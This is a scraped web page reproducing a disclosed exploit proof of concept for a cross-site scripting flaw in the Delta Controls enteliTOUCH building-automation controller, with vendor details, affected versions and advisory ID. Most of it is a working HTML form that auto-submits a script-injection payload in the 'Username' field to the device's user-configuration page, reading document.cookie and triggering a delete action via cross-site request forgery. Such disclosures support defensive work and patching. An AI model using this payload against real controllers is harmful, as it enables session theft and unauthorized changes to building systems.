扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch XSS</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5703 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php 06.04.2022 --> <form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST"> <input type="hidden" name="userInfo" value="" /> <input type="hidden" name="UL_SelectedOptionId" value="" /> <input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" /> <input type="hidden" name="formAction" value="Delete" /> <input type="submit" value="CSRF XSS Alert!" /> </form> </body> </html> |
体验盒子
